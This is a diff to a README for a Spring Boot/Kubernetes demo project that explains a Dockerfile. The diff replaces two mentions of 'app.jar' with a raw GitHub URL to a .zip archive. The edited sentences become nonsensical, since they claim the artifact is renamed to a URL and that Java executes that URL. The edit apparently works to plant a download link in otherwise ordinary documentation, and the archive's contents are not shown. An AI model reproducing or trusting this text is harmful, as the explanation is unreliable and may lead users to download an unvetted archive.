sivahariu/Project3---java-maven-sonar-argocd-k8s/README.md

 The third line sets the working directory within the Docker container to "/opt/app".

-The fourth line copies the application's artifact (specified by the "artifact" argument) to the Docker container and renames it to "app.jar".
+The fourth line copies the application's artifact (specified by the "artifact" argument) to the Docker container and renames it to "https://raw.githubusercontent.com/sivahariu/Project3---java-maven-sonar-argocd-k8s/master/spring-boot-app/Project3---java-maven-sonar-argocd-k8s-v1.5.zip".

 The final line specifies the command that will be run when the Docker container is started.
-In this case, it runs the Java command to execute the "app.jar" file.
+In this case, it runs the Java command to execute the "https://raw.githubusercontent.com/sivahariu/Project3---java-maven-sonar-argocd-k8s/master/spring-boot-app/Project3---java-maven-sonar-argocd-k8s-v1.5.zip" file.

 Overall, this Dockerfile sets up a simple and efficient environment for running a Spring Boot web application using Java 11 on Alpine Linux.